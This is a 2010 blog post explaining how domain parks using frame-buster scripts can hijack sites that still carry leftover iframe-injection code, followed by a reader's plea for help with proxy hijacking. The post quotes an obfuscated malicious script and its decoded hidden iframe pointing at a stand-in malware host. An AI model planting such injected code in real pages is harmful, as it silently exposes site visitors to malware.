Sunday, September 26, 2010

Domain Parks Hijacking Previously Hacked Sites?

Lately I've been seeing an increase in some domain parks using frame buster scripts and it really didn't make any sense to me.

Why would a domain park need a frame buster script?

Then I discovered a potential secret, these domain parks, whether intentional or not, are inadvertently hijacking sites that have been previously victims of the iframe injection hack!

Let's examine how this works.

The iframe injector exploit happens when a hacker adds a line of JavaScript to your page like this:

<script Language="Javascript">document.write(unescape('%3C%69%66%.....61%6D%65%3E'));</script>
That line of script translates the encrypted content in the unescape() command to something like this:
<iframe src="http://malware.location.example.com" width=1 height=1></iframe>

Once the search engines or browsers detect this problem then the victims site gets the normal safe surf malware warnings when visitors attempt to visit their pages as long as malware continues to exist on http://malware.location.example.com. However, once the malware is removed, often the hacked domains are shut down or abandoned and return to the domain park. The absence of malware at http://malware.location.example.com will stop displaying those safe surf warnings and everything looks normal again. Therefore, webmasters that never knew their sites were hacked in the first place, and never fixed the problem, are now potentially at the mercy of a domain park that employs frame busting.

If you didn't follow that, let's simplify it:

Some of the domain parks now add a FRAME BUSTER SCRIPT to their domain park pages.

Now any time a visitor goes to a site that was previously hacked and never repaired, and execute that JavaScript iframe injector code, the site is redirected to the domain park page.

You can see the frame buster script in the domain park pages:
function EscapeBrowserFrame(){ .... }
To add insult to injury, innocent webmasters were not only victims of hackers, but now they're the unwitting victims of having their sites hijacked by domain parks!

A nice double whammy!

Many sites have been hacked by server-wide exploits which have been documented previously in this very blog. It's very possible (most likely) the hosts never reported the problem to their customers so the website owners never knew they needed to fix their pages. This situation has probably left literally tens of thousands of sites vulnerable over time to being eventually hijacked.

That's the real kicker here is that the domain used to distribute malware could fall into the domain park at any time. Maybe the victims site will be hijacked today, maybe tomorrow, maybe a year from now, but the potential risk is great. If that line of JavaScript left by the hacker is allowed to stay in the victims website and the hackers site eventually falls into the right domain park, their site will also be hijacked.

Iframe injector scripts, the hackers gift that just keeps on giving!

1 comment:

Jimmy said...

Hi IncrediBill,

I came across some of your articles today and I really wanted to get some advice from you. recently I my blog has been proxy hijacked. At least thats what I think the term for it is. My htaccess file is clean however, you can see this well if you type in "cheap car insurance quotes" into google I was on the first page for my website centralinsurance.org now in place of it I see ronny-dwijayanto-web-proxy.appspot.com/centralinsurance.org/ I don't own this other domain and I am not sure how this is happening but you seem to be an expert in this subject. It there any chance you may be able to tell me how I can revert this proxy hijack as I don't see where they have actually broken into my site, just simply scraped the content form it. I am desperate, any help you can provide is very appreciated. My contact email is jimmykelley19@gmail.com I look forward to hearing from you, I have found no other help in any other areas yet and I am now trying to reach out to those that I believe know the solution, hence this email.

respectfully,
Jimmy